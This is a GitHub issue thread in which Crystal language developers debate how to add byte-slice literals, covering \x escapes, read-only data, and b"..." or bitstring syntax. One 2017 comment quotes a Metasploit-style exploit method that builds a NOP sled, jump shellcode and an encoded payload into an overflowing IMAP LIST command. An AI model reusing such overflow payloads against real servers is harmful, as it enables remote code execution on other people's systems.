Literals for Slice(UInt8) #2886

asterite · 2016-06-21T12:00:41Z

We need a way to express binary data embedded in the data section of the program. We can do this right now for strings, but there's no way to create a non-UTF8 string with a string literal.

There are several ways we can fix this:

1. We can add back the \x... escape to string literals, to add a byte with a specific hexadecimal value. Right now strings can hold non-UTF8 data, they just raise when using those strings as UTF-8 data (for example, iterating them), so it's strange that they can hold non-UTF8 data but one can't create them with a literal. From there, one could take a slice. This will also solve Remove macro methods from the language #2565 because inspecting a string with non-valid codepoints will output \x... for those values.
2. We add a literal for something like a Slice(UInt8). It could just be Slice(UInt8), but these are not read-only. Or maybe they can be read-only and they can crash the program when written. One shouldn't write to them, the same way one doesn't get a slice from a string literal and write to it. There was the idea of introducing const [...] for this, with which we could create static data for any kind of integer value.
3. Other options...?
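As a rough illustration of the first option, here is a minimal Crystal sketch. It assumes a compiler version in which string literals accept \x escapes, and it only relies on String#bytesize, String#valid_encoding? and String#to_slice; the variable names are made up for the example.

```crystal
# A string literal holding a byte that can never appear in valid UTF-8.
s = "ab\xFF"

puts s.bytesize        # 3 raw bytes
puts s.valid_encoding? # false, because of the 0xFF byte

# Taking a slice gives access to the raw bytes without copying.
bytes = s.to_slice
puts bytes[2]          # 255
puts bytes.read_only?  # true: the slice over string data is not writable
```

The string itself stays usable as a byte container; only UTF-8 aware operations are affected by the invalid byte.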

This doesn't have a big priority right now, but I'm leaving it here so there's a place to discuss this.

jhass · 2016-06-21T12:53:35Z

I would tend towards 2 with something like #2791 (comment) as the preferred alternative. Either way we need to make sure to not run into issues similar to #2485.

ysbaddaden · 2016-06-21T13:35:35Z

Same here: Slice(UInt8) is the de-facto type for binary data whereas String may only contain UTF-8 data. I don't think it's a good idea to push the idea that it's okay to put arbitrary bytes into a String.

> inspecting a string with non-valid codepoints will output \x... for those values

But I like that.

asterite · 2016-06-21T13:43:30Z

One issue we found the other day is that we needed to do a POST in the http client with binary data. We made it work by simply creating a String with that data and then invoking HTTP::Client.post. I think I like that, it's pretty convenient. Otherwise we'd need to add overloads or restrictions for Slice(UInt8), and HTTP::Request will have the body as String | Slice(UInt8), etc.

To compare with other statically typed languages, Go's strings are also just byte chunks that can hold arbitrary bytes, but can also be treated as UTF-8 strings when needed: https://blog.golang.org/strings

Java's String class is supposed to be UTF-16, but can hold arbitrary bytes as well.

jhass · 2016-06-21T13:56:05Z

I very much like that String is supposed to handle valid UTF-8 data and operations on that. And nothing else. I would hate to lose that property and would rather see convenience APIs added to other interfaces for handling Slice(UInt8). In the HTTP example, binary data would need some form of content encoding to valid ASCII values anyway. Detecting that the encoding is needed upon receiving a Slice(UInt8) rather than a String actually seems easier than always second-guessing whether a String needs it or not.

bcardiff · 2016-06-21T14:57:24Z

I am with @jhass here. I would keep String as valid UTF-8.

I would rather add overloads in the http client to send/receive blobs.
And I definitely want to be able to embed binary resources (Slice or StaticArray and then a convenient api to wrap it)

mperham · 2016-06-21T18:15:44Z

Would it be helpful or more performant to have Base64.decode(str, io) : Nil so I can decode the asset and stream it out with the response?

asterite · 2016-06-21T18:44:55Z

@mperham Good idea, an overload that writes directly to an IO is missing. Should be easy to add.
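For readers arriving later, a minimal sketch of what such a streaming call could look like. It assumes a Crystal version whose standard library provides a Base64.decode overload that takes an IO as second argument; the IO::Memory here is only a stand-in for a response body.

```crystal
require "base64"

# Stand-in for an embedded asset stored as Base64 text.
encoded = Base64.strict_encode("hello")

# Stand-in for the HTTP response; any IO would do.
io = IO::Memory.new

# Decode straight into the IO instead of building an intermediate Bytes.
Base64.decode(encoded, io)

puts io.to_s # hello
```

Writing directly to the IO avoids allocating a second buffer the size of the decoded asset.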

mperham · 2016-06-21T18:48:31Z

Just a side note, I'm trying to write the Slice(UInt8) out to the Kemal response:

    def self.serve(filename, resp)
      resp.status_code = 200
      resp.write Base64.decode(WEB_ASSETS[filename])
    end

I verified that the Slice size is exactly the same size as the file on disk but the response only has about half the expected bytes. Anyone know why the server response is not writing the entire Slice to the client?

asterite · 2016-06-21T19:04:57Z

@mperham we'd probably need concrete code that reproduces the problem to check whether something is wrong. I tried creating a slice of 5000~50000 bytes and it works well.

mperham · 2016-06-21T19:36:13Z

Looks like the problem is related to me not setting the content-type header. The browser prints out the PNG contents as text/html but serves it correctly when I set it to "application/octet-stream".

ozra · 2016-06-22T16:22:57Z

Just throwing thoughts into the mix here: how about a literal that generates a View(UInt8), which would be a read-only type derived from Slice(UInt8)? If it's known at compile time that an area is unwritable, the compiler should help us at compile time, avoiding a crash where possible.

david50407 · 2016-07-15T18:06:36Z

How about letting users create their own literal types (maybe in a %data{ ... } format, where data can be any word for each type, and {} can be [] or ()), like C++11 does?

Then we could create custom literals for Slice(UInt8), StaticArray(UInt8) or any other types we want (maybe using macros to define them at compile time?).

maxpowa · 2016-12-15T23:02:05Z

Any progress on this? My use case is writing bytes to an IO, as one might do when sending low-level packets on the wire. io.write_bytes(0x00000000, IO::ByteFormat::BigEndian) doesn't provide 4 empty bytes as one might expect, but rather outputs a single empty byte.

JacobUb · 2016-12-16T07:47:00Z

@maxpowa
It works for me 😕

io = IO::Memory.new
io.write UInt8.slice(1, 1, 1, 1, 1, 1, 1, 1)
io.rewind
io.write_bytes(0x00000000, IO::ByteFormat::BigEndian)
io.to_slice # Bytes[0, 0, 0, 0, 1, 1, 1, 1]

maxpowa · 2016-12-16T16:17:33Z

Yep, never mind, it is indeed working... I must have done something wrong when I was testing. Thanks @exilor

oprypin · 2017-07-10T21:27:09Z

> We can add back the \x... escape to string literals

This has been implemented in cd8296b, by the way.

I think it's a really bad idea to allow broken string literals in the language's core syntax. I noticed that some people are already doing hideous things with it, without really understanding the situation...
This should only be possible through an unsafe operation.

The alternative solution is the way to go. Bytes literals should definitely be a thing.

And "\xff" syntax should give an explicit error like "strings are for UTF-8 encoded text, not for arbitrary bytes".

Side note: in Python "\x**" means "\u{**}", but they do have bytes literals where it means what you'd expect: b'\xff'

bararchy · 2017-07-11T08:10:54Z

@oprypin but sometimes people need to do hideous things for hideous causes :)
This feature is important; it's heavily relied on in fuzzers and exploit development (yes FFS using Crystal ! :) )
https://www.offensive-security.com/metasploit-unleashed/shell/

    def exploit
      connected = connect_login
      nopes = "\x90" * (payload_space - payload.encoded.length) # to be fixed with make_nops()
      sjump = "\xEB\xF9\x90\x90"     # Jmp Back
      njump = "\xE9\xDD\xD7\xFF\xFF" # And Back Again Baby  ;)
      evil = nopes + payload.encoded + njump + sjump + [target.ret].pack("A3")
      print_status("Sending payload")
      sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
      sock.put(sploit)
      handler
      disconnect
    end

etc....

RX14 · 2017-07-11T08:28:28Z

It's still easy enough to construct a string with invalid data, I just don't think it should be part of the syntax.

oprypin · 2017-07-11T08:41:22Z

@bararchy, thanks for a good demonstration of the point I was making... All of these should have been Bytes

oprypin · 2017-09-26T20:29:18Z

I forgot that this issue existed and just started writing a new one.
Anyway... I'm just still appalled that there's a literal for invalid strings.

So, ping

Putting bytes literals in read-only data is a must-have, and so if the literal produces a writable Slice(UInt8), that's a problem. Or it used to be, not anymore! Now we even have read-only slices.
So there are really no blockers now.

asterite · 2017-09-26T20:47:37Z

Right now this is solved because one can use a String for this, because a String can now have arbitrary bytes.

I know it's not the most elegant solution, but for now it works. We can postpone a real solution for this for later.

oprypin · 2017-09-26T20:48:27Z

pls

asterite · 2017-09-26T20:54:08Z

What if we add:

b"some content"

For now that would be equivalent to:

"some content".to_slice

and of course you can use \xAB for specific byte values.

We could also have:

b'x'

to be the same as 'x'.ord.to_u8 and not have it compile if it doesn't fit in a UInt8, so that would be a byte literal.

I think Rust uses the same notation.
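To show what these two equivalences do with the current standard library, here is a small sketch. It uses only String#to_slice, Char#ord and Int#to_u8; note that the out-of-range case fails at run time here, whereas the proposed b'...' literal would reject it at compile time.

```crystal
# What b"some content" would be equivalent to for now.
content = "some content".to_slice
puts content.size       # 12
puts content.read_only? # true

# What b'x' would be equivalent to.
byte = 'x'.ord.to_u8
puts byte # 120

# A character whose code point does not fit in a UInt8 overflows at run time.
overflowed = false
begin
  'σ'.ord.to_u8
rescue OverflowError
  overflowed = true
end
puts overflowed # true
```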

oprypin · 2017-09-26T20:58:39Z

My suggestion that I started to write:

It would be a literal that does not allow \u escapes, and allows only ASCII characters, supplemented by the \xff syntax for arbitrary bytes. The literal would produce Slice(UInt8).

I propose the syntax b"foo\x12fsdfg", like in Python and Rust.

Side note, Bytes[] macro probably should be rewritten to produce a literal.

I would also suggest removing the hexadecimal notation from strings. Obviously, to replace the use case, the bytes literal would need to store the data in the read-only data section. I don't know whether that means that the size of the slice would need to be moved there as well, like it is with strings.

"some content".to_slice is impossible to do if hexadecimal escapes are removed from strings, which is the main problem I have

asterite · 2017-09-26T21:04:06Z

Oh, with "some content".to_slice I meant it would be equivalent to that. We could probably type b"hello" as a read-only Slice(UInt8) and put that in the ROM section of the program.

For that we'll probably need Slice to be part of the known types for the compiler, and have @pointer, @size and @read_only laid out accordingly in memory.

But for now I'd leave the ability to have \x.. escape sequences in a String. Later we can remove them, but we'll have to make sure that there's no way to create strings that are not valid in UTF-8. Maybe that will slow down everything a bit, but, well, correct code is better than fast code.

oprypin · 2017-09-26T21:10:12Z

@pointer, @size and @read_only could be directly followed by the data itself, with @pointer being equal to its own address + offset.

I don't think it's that important to prevent strings that are not valid UTF-8. The only way to create them is String.new(bytes or pointer), just raise the awareness. The problem is that people see nothing wrong with '\x' string literals and then intentionally seek out a way to recreate such strings "programmatically".

RX14 · 2017-10-06T17:57:09Z

@asterite We wouldn't need to know about Slice's internal layout, unlike String, because we can simply define that Slice needs to have a constructor taking a pointer and a size (which we already have). We only need to know String's layout because we put the data contiguously. With Slice we don't need to do that. And it's probably not worth doing it since it's a struct and LLVM will optimize since both the constructor arguments are literals.

oprypin · 2017-10-06T18:04:17Z

@RX14, are you sure you understand the part about putting this in read-only data section?

RX14 · 2017-10-06T20:25:22Z

@oprypin yes.... you pass a pointer to the data in the RO section to the slice constructor. The slice instance itself has to live on the stack anyway, so it can't be in ROdata.
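A minimal sketch of that constructor call, assuming the existing Slice.new(pointer, size, read_only: true) signature. The StaticArray is a hypothetical stand-in for data that the compiler would emit into the read-only section; in this sketch it simply lives on the stack.

```crystal
# Hypothetical stand-in for bytes placed in read-only data by the compiler.
data = StaticArray[0x89_u8, 0x50_u8, 0x4E_u8, 0x47_u8]

# The slice struct only stores a pointer, a size and the read-only flag.
bytes = Slice.new(data.to_unsafe, data.size, read_only: true)
puts bytes.read_only? # true

# Writes are rejected by Slice itself before they reach memory.
begin
  bytes[0] = 0_u8
rescue ex
  puts ex.message
end
```

With this shape the compiler would not need to know how Slice is laid out in memory, only that the constructor exists.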

oprypin · 2018-05-28T13:48:46Z

@RX14 Please reopen this

straight-shoota · 2018-05-29T10:06:24Z

Why was this even closed, along with all those other issues that are most definitely not fixed?

HertzDevil · 2022-06-15T16:23:59Z

I would go one step further and use a completely new syntax similar to Elixir's bitstrings, rather than simply borrowing the one for string literals:

<<0x12>>             # => <<0x12>>
<<0x21>>             # => "!"
<<0xCF, 0x83>>       # => "σ"
"\xCF\x83"           # => "σ"
<<0x12, 0xCF, 0x83>> # => <<0x12, 0xCF, 0x83>>
"\x12\xCF\x83"       # => <<0x12, 0xCF, 0x83>>
<<0x12, "σ">>        # => <<0x12, 0xCF, 0x83>>

(Every double-quoted string literal in Elixir denotes a bitstring. Single-quoted ones produce charlists.)

An attractive feature about them is they can handle multibyte sequences:

<<0x12345678::32>>        # => <<18, 52, 86, 120>>
<<0x12345678::32-little>> # => <<120, 86, 52, 18>>

<<1.0::little>>    # => <<0, 0, 0, 0, 0, 0, 240, 63>>
<<1.0::32-little>> # => <<0, 0, 128, 63>>

<<0xCF83::16>>        # => "σ"
<<0x83CF::16-little>> # => "σ"
<<"σ"::utf8>>         # => "σ"
<<"σ"::utf16-little>> # => <<195, 3>>
<<0x03C3::utf8>>      # => "σ"
<<0x03C3::utf16-big>> # => <<3, 195>>

It emphasizes the fact that byte arrays are a more general concept than string-like byte sequences.
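For comparison, a sketch of how multibyte values can be laid out at run time in Crystal today, using IO#write_bytes with IO::ByteFormat. This is not a literal syntax, only an illustration of the byte orders involved.

```crystal
io = IO::Memory.new

# 32-bit integer, big-endian then little-endian.
io.write_bytes(0x12345678_u32, IO::ByteFormat::BigEndian)
io.write_bytes(0x12345678_u32, IO::ByteFormat::LittleEndian)

# 32-bit float, little-endian.
io.write_bytes(1.0_f32, IO::ByteFormat::LittleEndian)

p io.to_slice # Bytes[18, 52, 86, 120, 120, 86, 52, 18, 0, 0, 128, 63]
```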

It is important that both the Bytes itself and the data it refers to are stored in read-only memory; the Slice constructor that accepts a pointer is unsafe, so the data must be encapsulated behind a read-only Bytes, with no other way to access it.

If we have an extremely fast String#valid_encoding?, say even faster than #each_char(&), then the performance penalties should be very minimal. So as a starter I think we should incorporate one of the algorithms in #11873. (In fact, the standard library has never used that method since its introduction.)
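As a sketch of what validating on construction could look like, assuming only String.new(Bytes) and String#valid_encoding?. The checked_string helper is hypothetical and not part of the standard library.

```crystal
# Hypothetical helper: build a String from bytes, refusing invalid UTF-8.
def checked_string(bytes : Bytes) : String
  str = String.new(bytes)
  raise ArgumentError.new("invalid UTF-8") unless str.valid_encoding?
  str
end

puts checked_string("abc".to_slice) # abc

rejected = false
begin
  checked_string(Bytes[0x61, 0xFF])
rescue ArgumentError
  rejected = true
end
puts rejected # true
```

The cost of such a check is one pass over the bytes, which is why the speed of valid_encoding? matters here.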

philipp-kempgen · 2024-03-27T00:02:30Z

Just to throw yet another idea in:
Ruby has the .b method for strings.
https://docs.ruby-lang.org/en/3.2/String.html#method-i-b
Maybe "bytestring\x00\x01".b could be treated as a byteslice literal in Crystal?
(I prefer to say "a ByteSlice" rather than "a Bytes".)

Ruby also has ?… for character literals (or rather single-character strings), even supporting control characters.
https://docs.ruby-lang.org/en/3.2/syntax/literals_rdoc.html#label-Strings

?\C-g == ?\a  # => true

Then again, b"…" and b'…' or Elixir bitstrings are probably better, if they could maybe use b(…) or b[…] or %b(…) instead of <<…>>, provided they let you write things like:

b( "filemagic", 0x01, 0x02, '\a', '\C-g' )

asterite added RFC topic:compiler status:draft labels Jun 21, 2016

spalladino added status:draft and removed status:draft RFC labels Jan 9, 2017

straight-shoota mentioned this issue Oct 4, 2017

Parser: add missing escape sequence for Char #5075

Closed

straight-shoota mentioned this issue Oct 6, 2017

Use byte encoding as Crystal string instead of Base64 schovi/baked_file_system#12

Merged

straight-shoota mentioned this issue Nov 9, 2017

Asset/Resource embedding? #1649

Open

asterite closed this as completed May 28, 2018

RX14 reopened this May 29, 2018

jhass mentioned this issue May 29, 2020

[RFC]Qt like File and Path interface for embed resources #9374

Open

kimburgess mentioned this issue Oct 15, 2020

CharLiteral#ord / binary char syntax #9830

Closed

wolfgang371 mentioned this issue Dec 22, 2020

Crystal String behaves inconsistent (and can cause compile time errors) #10132

Closed

straight-shoota mentioned this issue Mar 19, 2021

Disallow surrogate halves in escape sequences of string and character literals #10443

Merged

straight-shoota mentioned this issue Jul 13, 2021

Unicode tables as constants #4516

Closed

straight-shoota mentioned this issue Sep 30, 2021

Support '\xXX' notation for Chars #11260

Closed

straight-shoota mentioned this issue Feb 10, 2022

Reading or writing a binary file with Bytes #11586

Closed

HertzDevil mentioned this issue Jul 29, 2023

Experimental: Add Slice.literal for numeric slice constants #13716

Merged

HertzDevil mentioned this issue Jun 1, 2024

Hex Array Literals #14654

Closed

straight-shoota mentioned this issue Jun 6, 2024

UTF-16 string literals #14670

Closed

HertzDevil mentioned this issue Jul 4, 2024

Ambiguity between sigils and macro fresh variables #14782

Open

HertzDevil mentioned this issue Sep 18, 2024

Reusing AST nodes in macro #each #15008

Open
